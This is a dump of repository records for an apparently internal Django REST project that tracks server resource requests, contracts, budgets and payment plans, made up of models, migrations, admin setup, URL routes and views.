PaymentPlan(models.Model):\n contract = models.ForeignKey(Contract,verbose_name=\"合同编号\")\n paymentTime = models.CharField(verbose_name=\"付款时间\",max_length=50)\n numOfPayments = models.IntegerField(verbose_name=\"付款笔数\")\n ratioOfPayments = models.CharField(verbose_name=\"付款比例\",max_length=10)\n investment = models.FloatField(verbose_name=\"投资费用\", default=0)\n maintain = models.FloatField(verbose_name=\"维保费用\", default=0)\n development = models.FloatField(verbose_name=\"研发费用\", default=0)\n total = models.FloatField(verbose_name=\"总费用\", default=0)\n items = models.CharField(verbose_name=\"付款条款\",max_length=500,blank=True)\n\n class Meta:\n verbose_name = \"付款计划\"\n verbose_name_plural = verbose_name\n ordering = ('numOfPayments',)\n\nclass PaymentRecord(models.Model):\n contractId = models.CharField(verbose_name=\"合同编号\",max_length=50)\n paymentPlanId = models.CharField(verbose_name=\"付款计划编号\",max_length=50,default=\"\",blank=True)\n paymentPlanPk = models.CharField(verbose_name=\"付款计划id\",max_length=50,default=\"\",blank=True)\n numOfPayments = models.IntegerField(verbose_name=\"付款笔数\")\n billNum = models.CharField(verbose_name=\"报账单号\",max_length=50)\n investment = models.FloatField(verbose_name=\"投资费用\", default=0)\n maintain = models.FloatField(verbose_name=\"维保费用\", default=0)\n development = models.FloatField(verbose_name=\"研发费用\", default=0)\n total = models.FloatField(verbose_name=\"总费用\", default=0)\n billTime = models.CharField(verbose_name=\"报账时间\",max_length=50)\n processTime = models.CharField(verbose_name=\"审批时间\",max_length=50,blank=True)\n\n class Meta:\n verbose_name = \"付款记录\"\n verbose_name_plural = verbose_name\n ordering = (\"processTime\",)"
},
{
"alpha_fraction": 0.8695651888847351,
"alphanum_fraction": 0.8695651888847351,
"avg_line_length": 69,
"blob_id": "47911f0086e69f1d8cab8375c7fe590c416e7409",
"content_id": "ccd3b1907bd7ff09acf73f545037cc039519d1b7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 69,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 1,
"path": "/apps/serverApplication/__init__.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "default_app_config = \"serverApplication.apps.ServerapplicationConfig\""
},
{
"alpha_fraction": 0.7864077687263489,
"alphanum_fraction": 0.7864077687263489,
"avg_line_length": 19.600000381469727,
"blob_id": "ebbe746d04f7850491c9faabc60056b240019651",
"content_id": "1ffb75579891e2a088cdedb772c3bfcd3fd8a9f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 103,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 5,
"path": "/apps/contractBudget/apps.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "from django.apps import AppConfig\n\n\nclass ContractbudgetConfig(AppConfig):\n name = 'contractBudget'\n"
},
{
"alpha_fraction": 0.5166364312171936,
"alphanum_fraction": 0.6067755818367004,
"avg_line_length": 46.228572845458984,
"blob_id": "d1d7a249118126700bc09dd3b00e4d169b2b3260",
"content_id": "1627a19b848c5024acd8724ce96a6ed69e648a24",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1653,
"license_type": "no_license",
"max_line_length": 164,
"num_lines": 35,
"path": "/apps/contractBudget/migrations/0007_paymentplan.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-03-31 14:19\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('contractBudget', '0006_auto_20170330_1331'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='PaymentPlan',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('paymentTime', models.CharField(max_length=50, verbose_name='\\u4ed8\\u6b3e\\u65f6\\u95f4')),\n ('numOfPayments', models.IntegerField(verbose_name='\\u4ed8\\u6b3e\\u7b14\\u6570')),\n ('ratioOfPayments', models.CharField(max_length=10, verbose_name='\\u4ed8\\u6b3e\\u6bd4\\u4f8b')),\n ('investment', models.FloatField(default=0, verbose_name='\\u6295\\u8d44\\u8d39\\u7528')),\n ('maintain', models.FloatField(default=0, verbose_name='\\u7ef4\\u4fdd\\u8d39\\u7528')),\n ('development', models.FloatField(default=0, verbose_name='\\u7814\\u53d1\\u8d39\\u7528')),\n ('total', models.FloatField(default=0, verbose_name='\\u603b\\u8d39\\u7528')),\n ('contract', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contractBudget.Contract', verbose_name='\\u5408\\u540c\\u7f16\\u53f7')),\n ],\n options={\n 'ordering': ('numOfPayments',),\n 'verbose_name': '\\u4ed8\\u6b3e\\u8ba1\\u5212',\n 'verbose_name_plural': '\\u4ed8\\u6b3e\\u8ba1\\u5212',\n },\n ),\n ]\n"
},
{
"alpha_fraction": 0.6630695462226868,
"alphanum_fraction": 0.6702637672424316,
"avg_line_length": 49.54545593261719,
"blob_id": "f8ed37799ccbf902f9c5a418acf1e4325420c0ce",
"content_id": "8bba344d057cb182d15563e5f655a263b8f64d11",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1668,
"license_type": "no_license",
"max_line_length": 153,
"num_lines": 33,
"path": "/apps/application/adminx.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# _*_ coding: utf-8 _*_\n__author__ = 'Clarence'\n__date__ = '2017/2/15 10:48'\n\n\nimport xadmin\n\nfrom .models import RootApplication, ServerApplication,Order\n\n\nclass RootApplicationAdmin(object):\n list_display = ['user', 'ip', 'reason', 'status','applyTime','deadline','email']\n search_fields = ['user', 'ip', 'reason', 'status','email']\n list_filter = ['user', 'ip', 'reason', 'status','applyTime','deadline','email']\n\nclass ServerApplicationAdmin(object):\n\n list_display = ['user','username','ip','source','environment','os','deadline','reason','email','orderId','status','applyTime','department']\n search_fields = ['user','username','ip','source','environment','os','reason','email','orderId','status','department']\n list_filter = ['user','username','ip','source','environment','os','deadline','reason','email','orderId','status','applyTime','department']\n\n list_display = ['user','username','ip','source','environment','os','deadline','reason','email','orderId','status','applyTime','cpu','memory','store']\n search_fields = ['user','username','ip','source','environment','os','reason','email','orderId','status','cpu','memory','store']\n list_filter = ['user','username','ip','source','environment','os','deadline','reason','email','orderId','status','applyTime','cpu','memory','store']\n\n\nclass OrderAdmin(object):\n list_display = ['orderId','user','status','applyTime']\n search_fields = ['orderId','user','status']\n list_filter = ['orderId','user','status','applyTime']\nxadmin.site.register(RootApplication,RootApplicationAdmin)\nxadmin.site.register(ServerApplication,ServerApplicationAdmin)\nxadmin.site.register(Order,OrderAdmin)\n"
},
{
"alpha_fraction": 0.5224625468254089,
"alphanum_fraction": 0.5343177914619446,
"avg_line_length": 36.27131652832031,
"blob_id": "918fe2bb00907ff6f73ff77b42405e87bdb8fd8e",
"content_id": "df0a03a234bacbfbcf78e40ffed14aef0dc0fa9f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4974,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 129,
"path": "/apps/users/views.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- encoding: utf-8 -*-\nimport json\nfrom django.shortcuts import render\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom .forms import LoginFrom\nfrom rest_framework import status\nfrom .models import UserProfile\nfrom django.http import HttpResponse\nfrom django.contrib.auth import authenticate,login\nfrom django.contrib.auth.backends import ModelBackend\nfrom django.db.models import Q\nfrom rest_framework import generics\nfrom rest_framework import status\nfrom django.http import Http404\n# from zeep import Client\n\n\nfrom .serializers import UserLoginSerializer, UserProfileSerializer\n# Create your views here.\n\nclass CustomBackend(ModelBackend):\n\tdef authenticate(self, username=None, password=None, **kwargs):\n\t\ttry:\n\t\t\tuser = UserProfile.objects.get(Q(username=username)|Q(email=username))\n\t\t\tif user.check_password(password):\n\t\t\t\treturn user\n\t\texcept Exception as e:\n\t\t\treturn None\n\n\nclass LoginView(APIView):\n def get_object(self,email):\n try:\n return UserProfile.objects.get(email=email)\n except UserProfile.DoesNotExist:\n raise None\n\n def get(self,request,email):\n user = self.get_object(email)\n serializer = UserProfileSerializer(user)\n return Response(serializer.data)\n\n # return Response({\"msg\":u\"登录\"},status=status.HTTP_200_OK)\n\n def post(self,request):\n result = {}\n email = request.data.get(\"email\",False)\n pass_word = request.data.get(\"password\",\"\")\n print(request.data.get(\"email\",\"\"))\n user = authenticate(username=email,password=pass_word)\n if user is not None:\n if user.is_active:\n login(request,user)\n result = {\n 'info' : u\"成功登入,记得保存Cookie\" ,\n 'success' : True,\n 'code': status.HTTP_200_OK,\n 'name':\"张三\",\n 'department':\"系统室\"\n }\n return Response(data=result)\n else:\n return Response({\"msg\":u\"用户未激活\"},status=status.HTTP_401_UNAUTHORIZED)\n else:\n return Response({\"msg\":u\"用户名或密码错误\"},status=status.HTTP_200_OK)\n\n # def post(self,request):\n # result = {}\n # userSerializer = UserLoginSerializer(data=request.data)\n #\n # if userSerializer.is_valid():\n # email = request.data.get(\"email\",\"\")\n # password = request.data.get(\"password\",\"\")\n # client = Client('http://172.17.249.10/newsysservice/Portal.asmx?wsdl')\n # result1 = client.service.UserAuthenticate(UserAccount=email,Password=password)\n # #user = authenticate(username=email,password=password)\n # print(result1)\n # if result1 is True:\n # email = email[-len(email):-11]\n # print \"ddd\"+email\n # client = Client('http://172.17.249.10/newsysservice/userinfo.asmx?wsdl')\n # userInfo=client.service.GetUserInfo(Token='Kfzx01!',UserAccount=email)\n # userInfo = userInfo.encode(\"utf-8\")\n # userInfo = json.loads(userInfo)\n # print userInfo[\"TeamName\"]\n # result = {\n # 'info' : u\"成功登入,记得保存Cookie\" ,\n # 'success' : True,\n # 'code': status.HTTP_200_OK,\n # 'name':userInfo[\"UserName\"],\n # 'department':userInfo[\"TeamName\"]\n # }\n # response = Response(data=result)\n # return response\n # # else:\n # # result = {\n # # 'info' : u\"用户被禁止登录\" ,\n # # 'success' : False,\n # # 'code': status.HTTP_300_MULTIPLE_CHOICES\n # # }\n # # response = Response(data=result)\n # # return response\n # # else:\n # # result = {\n # # 'info' : u\"用户被禁止登录\" ,\n # # 'success' : False,\n # # 'code': status.HTTP_300_MULTIPLE_CHOICES\n # # }\n # else:\n # result = {\n # 'info': u\"用户名或密码错误\",\n # 'success': False,\n # 'code': status.HTTP_300_MULTIPLE_CHOICES\n #\n # }\n # return Response(data=result)\n # else:\n # result = {\n # 'info': u\"输入格式不正确\",\n # 'success': False,\n # 'code': status.HTTP_400_BAD_REQUEST\n # }\n # # return self.responseJson(result)\n # return Response(data=result)\n\n #验证通过后,根据sysnew邮箱获取用户信息\n def getUserByEmail(self,request):\n return Response(data={\"msg\":\"ok\"})\n"
},
{
"alpha_fraction": 0.5006954073905945,
"alphanum_fraction": 0.563282310962677,
"avg_line_length": 27.760000228881836,
"blob_id": "74c276d4cb4c0833de84ec66e579089d52619a68",
"content_id": "b7037b54485dba62bfae5c787d2bdba419136c69",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 719,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 25,
"path": "/apps/serverApplication/migrations/0004_os.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-02-27 13:59\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('serverApplication', '0003_auto_20170211_1929'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Os',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('type', models.CharField(max_length=20, verbose_name='\\u64cd\\u4f5c\\u7cfb\\u7edf')),\n ],\n options={\n 'verbose_name': '\\u64cd\\u4f5c\\u7cfb\\u7edf',\n },\n ),\n ]\n"
},
{
"alpha_fraction": 0.6291989684104919,
"alphanum_fraction": 0.6366925239562988,
"avg_line_length": 42.011112213134766,
"blob_id": "0ca0780184cfdb9c208af21f5fcac7909f12985b",
"content_id": "e2b8655a32b3001fcc4de6cd98a6e74220eaff5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3992,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 90,
"path": "/apps/administrator/views.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# encoding: utf-8\nfrom django.db.models import Q\nfrom django.contrib.auth import authenticate, login\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n# Create your views here.\nfrom users.forms import LoginFrom\nfrom application.models import RootApplication,ServerApplication,Order\nfrom application.serializers import RootApplicationSerializer,ServerApplicationSerializer\nfrom utils.email_send import send_email\nfrom .forms import ModelFormWithFileField\nclass LoginView(APIView):\n # def get(self, request):\n # return render(request, 'page_login.html')\n\n def post(self, request):\n loginForm = LoginFrom(request.POST)\n if loginForm.is_valid():\n email = request.POST.get(\"email\", \"\")\n password = request.POST.get(\"password\", \"\")\n # password = make_password(password=password)\n # administrator = UserProfile.objects.get(Q(email=email),Q(password=password))\n administrator = authenticate(username=email, password=password)\n if administrator:\n if administrator.is_active:\n # login(request, administrator)\n return Response({\"msg\": \"success\", \"status\": status.HTTP_200_OK})\n else:\n return Response({\"msg\": \"用户未激活\", \"status\": status.HTTP_403_FORBIDDEN})\n\n else:\n return Response({\"msg\": \"用户名或密码错误\", \"status\": status.HTTP_300_MULTIPLE_CHOICES})\n else:\n return Response({\"msg\": \"输入格式不正确\", \"status\": status.HTTP_400_BAD_REQUEST})\n\nclass RootApplicationListView(APIView):\n def get(self, request):\n condition = request.query_params.get(\"condition\")\n if condition == '1':\n allRootApplications = RootApplication.objects.filter(status='申请中')\n elif condition == '2':\n allRootApplications = RootApplication.objects.filter(status=\"使用中\")\n else:\n RootApplication().setExpiredApplication()\n allRootApplications = RootApplication().getExpiredApplication()\n serializer = RootApplicationSerializer(allRootApplications, many=True)\n return Response(serializer.data)\n\nclass ServerApplicationListView(APIView):\n def get(self,request):\n orderId = request.query_params.get(\"orderId\",None)\n type = request.query_params.get(\"type\")\n if orderId:\n allApplcations = ServerApplication.objects.all().filter(orderId=orderId)\n else:\n allApplcations = ServerApplication.objects.all()\n if type == '1':\n allApplcations = allApplcations.filter(status=\"申请中\")\n elif type == '2':\n allApplcations = allApplcations.filter(status=\"使用中\")\n else:\n allApplcations = allApplcations.filter(status=\"已到期\")\n serializer = ServerApplicationSerializer(allApplcations,many=True)\n return Response(serializer.data)\n\nclass EmailListView(APIView):\n def post(self,request):\n type = request.data.get(\"type\")\n sendTo = request.data.get(\"user\",\"\")\n content = request.data.get(\"content\",\"\")\n send_type = \"\"\n if type == '1':\n send_type = \"到期资源提醒\"\n elif type == '2':\n send_type = \"环境分配完成通知\"\n elif type == '3':\n send_type = request.data.get(\"theme\",\"\")\n # sendTo = sendTo.split(\";\")\n send_email(sendTo,content,send_type=send_type)\n return Response({\"msg\":\"发送成功\",\"status\":status.HTTP_200_OK})\n\nclass FileUploaderView(APIView):\n def post(self,request):\n form = ModelFormWithFileField(request.POST,request.FILES)\n if form.is_valid():\n form.save()\n return Response({\"msg\":\"上传成功\",\"status\":status.HTTP_200_OK})\n else:\n return Response({\"msg\":\"上传失败\",\"status\":status.HTTP_200_OK})"
},
{
"alpha_fraction": 0.5302096009254456,
"alphanum_fraction": 0.6128236651420593,
"avg_line_length": 29.037036895751953,
"blob_id": "c18b5e32b2db36fc8c16cf2f73cbd1f985a89229",
"content_id": "5da40e4f3071c78120678776219314a957efaba4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 811,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 27,
"path": "/apps/contractBudget/migrations/0011_auto_20170406_0913.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-04-06 09:13\nfrom __future__ import unicode_literals\n\nimport datetime\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('contractBudget', '0010_paymentrecord_paymentplanpk'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='contract',\n name='name',\n field=models.CharField(default=datetime.datetime(2017, 4, 6, 9, 13, 32, 738000), max_length=50, verbose_name='\\u5408\\u540c\\u540d\\u79f0'),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='contract',\n name='comment',\n field=models.CharField(max_length=500, verbose_name='\\u5408\\u540c\\u5185\\u5bb9'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.4755783975124359,
"alphanum_fraction": 0.5604113340377808,
"avg_line_length": 28.923076629638672,
"blob_id": "f45d0e3339427c4b6aeb882c1a734244e03f9f7d",
"content_id": "5ae0da63a427e92493053ca82f58af86205bf80c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 778,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 26,
"path": "/apps/serverApplication/migrations/0007_source.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-02-28 09:42\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('serverApplication', '0006_auto_20170227_1555'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Source',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=30, verbose_name='\\u6765\\u6e90')),\n ],\n options={\n 'verbose_name': '\\u9879\\u76ee\\u6765\\u6e90',\n 'verbose_name_plural': '\\u9879\\u76ee\\u6765\\u6e90',\n },\n ),\n ]\n"
},
{
"alpha_fraction": 0.5384615659713745,
"alphanum_fraction": 0.625,
"avg_line_length": 25,
"blob_id": "3c0db6db6d44caa23bf63d3399c70c00d5a659f9",
"content_id": "6a76f2ce502a161f144d64cf6643f4a07b529ce7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 520,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 20,
"path": "/apps/contractBudget/migrations/0012_auto_20170406_0918.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-04-06 09:18\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('contractBudget', '0011_auto_20170406_0913'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='paymentrecord',\n name='processTime',\n field=models.CharField(blank=True, max_length=50, verbose_name='\\u5ba1\\u6279\\u65f6\\u95f4'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5314401388168335,
"alphanum_fraction": 0.6186612844467163,
"avg_line_length": 23.649999618530273,
"blob_id": "b486070ab965dc62e3a1c2f08e46b23833de7ef9",
"content_id": "49cec29889803d3d22065862e13165e4b31b7fdb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 493,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 20,
"path": "/apps/application/migrations/0003_auto_20170220_1052.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-02-20 10:52\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('application', '0002_auto_20170215_1349'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='rootapplication',\n name='deadline',\n field=models.DateTimeField(verbose_name='\\u622a\\u6b62\\u65e5\\u671f'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.36000001430511475,
"alphanum_fraction": 0.5066666603088379,
"avg_line_length": 24.33333396911621,
"blob_id": "7ad1ea33a1986bb0fc3659b93f046a67013de1f1",
"content_id": "42111a6e2b1be760b028fc38c04cd9b1a7302087",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 75,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 3,
"path": "/functionTests/__init__.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# _*_ coding: utf-8 _*_\n__author__ = 'Clarence'\n__date__ = '2017/4/6 16:11'"
},
{
"alpha_fraction": 0.469788521528244,
"alphanum_fraction": 0.6243705749511719,
"avg_line_length": 47.43902587890625,
"blob_id": "674fe6273b96214dc77a12377c828492e501a330",
"content_id": "365b9825a7c6fca91e60e065c1ff7af792a5c147",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1986,
"license_type": "no_license",
"max_line_length": 532,
"num_lines": 41,
"path": "/apps/application/migrations/0015_auto_20170313_1715.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-03-13 17:15\nfrom __future__ import unicode_literals\n\nimport datetime\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('application', '0014_merge'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='order',\n name='lastModified',\n field=models.DateTimeField(default=datetime.datetime.now, verbose_name='\\u6700\\u540e\\u4fee\\u6539\\u65f6\\u95f4'),\n ),\n migrations.AddField(\n model_name='serverapplication',\n name='department',\n field=models.CharField(default='\\u7cfb\\u7edf\\u5ba4', max_length=200, verbose_name='\\u6240\\u5728\\u79d1\\u5ba4'),\n ),\n migrations.AddField(\n model_name='serverapplication',\n name='lastModified',\n field=models.DateTimeField(default=datetime.datetime.now, verbose_name='\\u6700\\u540e\\u4fee\\u6539\\u65f6\\u95f4'),\n ),\n migrations.AlterField(\n model_name='order',\n name='status',\n field=models.CharField(choices=[('\\u7533\\u8bf7\\u4e2d', '\\u7533\\u8bf7\\u4e2d'), ('\\u4f7f\\u7528\\u4e2d', '\\u4f7f\\u7528\\u4e2d'), ('\\u5df2\\u56de\\u6536', '\\u5df2\\u56de\\u6536')], default='\\u7533\\u8bf7\\u4e2d', max_length=20),\n ),\n migrations.AlterField(\n model_name='serverapplication',\n name='status',\n field=models.CharField(choices=[('\\u7533\\u8bf7\\u4e2d', '\\u7533\\u8bf7\\u4e2d'), ('\\u5ba1\\u6838\\u901a\\u8fc7-\\u5206\\u914d\\u4e2d', '\\u5ba1\\u6838\\u901a\\u8fc7-\\u5206\\u914d\\u4e2d'), ('\\u4f7f\\u7528\\u4e2d', '\\u4f7f\\u7528\\u4e2d'), ('\\u62d2\\u7edd', '\\u62d2\\u7edd'), ('\\u56de\\u6536\\u7533\\u8bf7\\u4e2d', '\\u56de\\u6536\\u7533\\u8bf7\\u4e2d'), ('\\u5ef6\\u671f\\u4e2d', '\\u5ef6\\u671f\\u4e2d'), ('\\u5df2\\u56de\\u6536', '\\u5df2\\u56de\\u6536'), ('\\u90e8\\u5206\\u56de\\u6536', '\\u90e8\\u5206\\u56de\\u6536')], default='\\u7533\\u8bf7\\u4e2d', max_length=20),\n ),\n ]\n"
},
{
"alpha_fraction": 0.7308781743049622,
"alphanum_fraction": 0.7381964325904846,
"avg_line_length": 63.181819915771484,
"blob_id": "6bbda23ab442b5a8366d641521481c7ff8538f4b",
"content_id": "4684b5b7eae43f0dd09fd4b94c10106fa1ddb765",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4236,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 66,
"path": "/SspApi/urls.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "\"\"\"SspApi URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Add an import: from blog import urls as blog_urls\n 2. Import the include() function: from django.conf.urls import url, include\n 3. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))\n\"\"\"\nfrom django.conf import settings\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nimport xadmin\nfrom users.views import LoginView\nfrom serverApplication.views import ApplicationListView, OsListView,EnvironmentView,SourceListView\nfrom application.views import ServerApplicationListView,UsingApplicationDetailView,UsingApplicationsListView\nfrom application.views import RootApplicationListView, RootApplicationDetailView,OrderListView\nfrom contractBudget.views import ProjectListView, ProjectDetailView,BudgetListView,BudgetDetailView,\\\n SupplierListView,SupplierDetailView,ContractListView,ContractDetailView,PaymentPlanListView\nfrom contractBudget.views import PaymentPlanDetailView,PaymentRecordListView,getContractByPaymentPlan,\\\n PaymentRecordDetailView,getContractByContractId,ContractPaymentListView\nurlpatterns = [\n url(r'^xadmin/', xadmin.site.urls),\n url(r'^login/$',LoginView.as_view(),name=\"login\"),\n url(r'^applications/$', ApplicationListView.as_view(), name='application'),\n url(r'^ueditor/',include('DjangoUeditor.urls' )),\n # url(r'^users/(?P<pk>[0-9]+)$',LoginView.as_view(),name=\"getUserByEmail\"),\n url(r'^users/(?P<email>[0-9a-zA-Z]+@(sysnew|Sysnew).com)',LoginView.as_view(),name=\"getUserByEmail\"),\n url(r'^rootapplications/$',RootApplicationListView.as_view(),name=\"rootApplicationList\"),\n url(r'^rootapplications/(?P<pk>[0-9]+)$',RootApplicationDetailView.as_view(),name=\"rootApplicationDetail\"),\n url(r'os/$',OsListView.as_view(),name=\"osListView\"),\n url(r'environments/$',EnvironmentView.as_view(),name=\"environmentListView\"),\n url(r'sources/$',SourceListView.as_view(),name=\"sourceListView\"),\n url(r'serverapplications/$',ServerApplicationListView.as_view(),name=\"serverApplicationListView\"),\n url(r'orders/$',OrderListView.as_view(),name=\"orderListView\"),\n url(r'usingresource/(?P<pk>[0-9]+)$',UsingApplicationDetailView.as_view(),name=\"serverapplicationDeatilView\"),\n url(r'usingresource/$',UsingApplicationsListView.as_view(),name=\"usingApplication\"),\n url(r'projects/$',ProjectListView.as_view(),name=\"projectListView\"),\n url(r'projects/(?P<pk>[0-9]+)$',ProjectDetailView.as_view(),name=\"projectDetailView\"),\n url(r'budgets/$',BudgetListView.as_view(),name=\"BudgetListView\"),\n url(r'budgets/(?P<pk>[0-9]+)$',BudgetDetailView.as_view(),name=\"BudgetDetailView\"),\n url(r'suppliers/$',SupplierListView.as_view(),name=\"SupplierListView\"),\n url(r'suppliers/(?P<pk>[0-9]+)$',SupplierDetailView.as_view(),name=\"SupplierDetailView\"),\n url(r'contracts/$',ContractListView.as_view(),name=\"ContractListView\"),\n url(r'contracts/(?P<pk>[0-9]+)$',ContractDetailView.as_view(),name=\"ContractDetailView\"),\n url(r'paymentplans/$',PaymentPlanListView.as_view(),name=\"PaymentListView\"),\n url(r'paymentplans/(?P<pk>[0-9]+)$',PaymentPlanDetailView.as_view(),name=\"PaymentDetailView\"),\n url(r'paymentrecords/$',PaymentRecordListView.as_view(),name=\"PaymentRecordListView\"),\n url(r'pp/(?P<pk>[0-9]+)$',getContractByPaymentPlan),\n url(r'paymentrecords/(?P<pk>[0-9]+)$',PaymentRecordDetailView.as_view(),name=\"PaymentRecordDetailView\"),\n url(r'getContractByContractId/$',getContractByContractId),\n url(r'contractPayments/$',ContractPaymentListView.as_view(),name=\"contractPaymentListview\"),\n url(r'^administrator/',include('administrator.urls',namespace=\"administrator\"))\n]\n# if settings.DEBUG:\n# import debug_toolbar\n# urlpatterns += [\n# url(r'^__debug__/', include(debug_toolbar.urls)),\n# ]\n"
},
{
"alpha_fraction": 0.6796390414237976,
"alphanum_fraction": 0.7010716199874878,
"avg_line_length": 37.565216064453125,
"blob_id": "8bf8cd403262f925e3921ae1b61bf47b7f3b972c",
"content_id": "611b1cc81ba33241e4a46bc699d166a678017baf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1905,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 46,
"path": "/apps/serverApplication/models.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- encoding:utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models\nfrom DjangoUeditor.models import UEditorField\n# Create your models here.\nclass Application(models.Model):\n ip = models.CharField(max_length=50,verbose_name=u\"IP地址\")\n username = models.CharField(max_length=20,verbose_name=u\"用户名\")\n user = models.CharField(max_length=10,verbose_name=u\"使用人\")\n team = models.CharField(max_length=50,verbose_name=u\"室/团队\")\n source = models.CharField(max_length=50,verbose_name=u\"来源\")\n environment = models.CharField(max_length=20,verbose_name=u\"环境类别\")\n os = models.CharField(max_length=10,verbose_name=u\"操作系统\")\n applyTime = models.CharField(max_length=100,verbose_name=u\"申请时间\")\n expireDate = models.CharField(max_length=100,verbose_name=u\"到期时间\")\n comment = UEditorField(verbose_name=u'备注',width=600, height=300, imagePath=\"editor/image\", filePath=\"editor/files\",default=\"\")\n lastModified = models.CharField(max_length=100)\n received = models.CharField(max_length=10, default='no',verbose_name=u\"是否已经回收\")\n\n\n class Meta:\n verbose_name = \"服务器申请信息\"\n verbose_name_plural = verbose_name\n ordering = 